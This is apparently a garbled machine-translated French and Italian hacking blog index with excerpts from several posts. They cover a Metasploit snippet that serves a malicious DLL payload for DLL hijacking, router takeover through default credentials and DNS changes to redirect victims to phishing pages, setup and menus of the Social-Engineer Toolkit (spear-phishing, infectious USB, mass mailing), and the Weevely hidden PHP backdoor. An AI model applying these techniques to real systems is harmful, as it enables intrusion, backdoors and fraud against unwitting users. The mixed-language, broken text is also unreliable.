ClsHack:Computer Security Blog    

Plus d'informations sur cette vulnérabilité, nous pouvons trouver ici:

[DLL Détournement] Sous Windows 7 et plus Exuction code de l'application à distance => metasplooit

Voyons maintenant les applications comme vulnérables :D

Toujours dans le mentionné ci-dessus, J'ai montré comment vous pouvez exploiter la vulnérabilité Metasploit, sfruttando webdav, anche da remoto.

L'exploit creato da HD Moore, développeur metaploit est très simple.
Le code qui nous intéresse, c'est:

                if (request.uri =~ /\.(dll|dl|drv|cpl)$/i)
                        print_status("#{cli.peerhost}:#{cli.peerport} GET => DLL Payload")
                        return if ((p = regenerate_payload(cli)) == nil)
                        data = Msf::Util::EXE.to_win32pe_dll(framework, p.encoded)
                        send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
                        return
               end

(plus…)

En pochissimi, changer le mot de passe pour le routeur -. -’ pour plus de commodité vous laissez la valeur par défaut, que facile à retenir o.O

Utilisateur: d'administration
Mot de passe: d'administration

En mode questo, si le routeur est accessible à partir, ou si un utilisateur, en mesure de se joindre à notre réseau peut tirer parti dns mener des attaques ciblées sur votre PC :D
Les attaques vont de phishing:
Wiki:

Dans le domaine de la sécurité informatique, phishing est le processus pénalement frauduleuse de tenter d'acquérir des informations sensibles telles que noms d'utilisateur, mots de passe et numéros de carte de crédit en se faisant passer comme une entité digne de confiance dans une communication électronique. Communications prétendant être de la célèbre des sites Web sociaux, des sites d'enchères, processeurs de paiement en ligne ou les administrateurs informatiques sont couramment utilisés pour attirer le public non averti. Le phishing est généralement effectuée par e-mail ou la messagerie instantanée.

à prendre le contrôle à distance de PC de la victime :D

Tout cela en utilisant le DNS.
Quand on peut aller dans le routeur, en plus de changer le SSID du wifi “Che Che stronzo sie” / “Sei a merda” et de la merde différents, nous pouvons changer le DNS.
Par exemple, Google I ceux o.O

Je serveur DNS, vulgairement parlant, ne rien faire, mais revenir l'ip du site vers lequel nous nous connectons, par exemple si on tape www.clshack.com:
; < <>> DiG 9.7.0-P1 < <>> www.clshack.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER< <- opcode: QUERY, status: NOERROR, id: 29740
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;www.clshack.com. IN A
;; ANSWER SECTION:
www.clshack.com. 31 IN A 94.141.22.26
;; Query time: 127 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Thu Aug 19 19:12:04 2010
;; MSG SIZE rcvd: 48
Il retourne:
94.141.22.26
(plus…)

La Ingénierie sociale Toolkit (SET) a été produit par David Kennedy et mettre à la disposition de l'attaquant exploite une remarquable, Sociale de type génie di avec une confortable interfaccia :D

L'objectif principal de SET est l'automatisation de ces attaques, presque toujours à l'aide la bêtise humaine.

Voyons comment utiliser.
sudo apt-get install python-pexpect
Nous avons besoin de faire un lien symbolique ne seraient autrement pas être réglée si nous ne faisons pas marche arrière 4:
sudo -s
mkdir /pentest
mkdir /pentest/exploits/
mkdir /pentest/exploits/framework3/
sudo ln -s "WHERE_IS_METASPLOIT/*" /pentest/exploits/framework3/
Par exemple:
sudo ln -s /home/clshack/msf3/* /pentest/exploits/framework3/

Nous entrons dans le terminal, et nous télécharger la dernière version:

svn co http://svn.secmaniac.com/social_engineering_toolkit SET/
cd SET
sudo ./set
Une fois ouvert,, avremo un menu un po’ lamerico -. -’


1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious USB/CD/DVD Generator
4. Update the Metasploit Framework
5. Update the Social-Engineer Toolkit
6. Create a Payload and Listener
7. Mass Mailer Attack
8. Help, Credits, and About
9. Exit the Social-Engineer Toolkit

Voyons en détail les options.

1. Vecteurs d'attaque Spear-Phishing
Dactylographie 1, nous aurons sensiblement 3 options:

• Effectuer une attaque Mass Email
• Créer un Payload FileFormat
• Créer un modèle social-ingénierie

(plus…)

Weevely est un outil conçu pour créer et gérer une porte dérobée cachée sur la télécommande serveur web php.

Crypte Weevely communications entre le client et le serveur dans les champs HTTP_REFERER plausible de se cacher dans les journaux de recherche et de NIDS du serveur web.
Weevely permette di:

Generare la porte dérobée PHP dynamiquement cifrata

• Exécuter des commandes sur un shell à distance, demandes obscures au sein plausible HTTP_REFERER
• Simulation d'un terminal pour envoyer des commandes au shell distant comme ci-dessus
• Eviter certaines configurations PHP qui limitent l'exécution de commandes sur le système
• Modules de fonctionner sur la machine distante pour automatiser des tâches.
• Ajouter de nouveaux modules rapidement et facilement

Scritto en python e open source.
Pour une installation sur debian / ubuntu:
sudo apt-get install python-numpy
(plus…)

Moins de sécurité… à qui la faute ? Presque toujours notre… Par exemple, une secousse H4, un puissant’ temps auparavant, il a rejoint le blog de notre ami sskull.

Venez ha fatto ?

Con non la force brutale attacco, notre ami sskull certains avaient laissé un mot de passe’ trop faible et que l'enfant est entré dans la merde…
(plus…)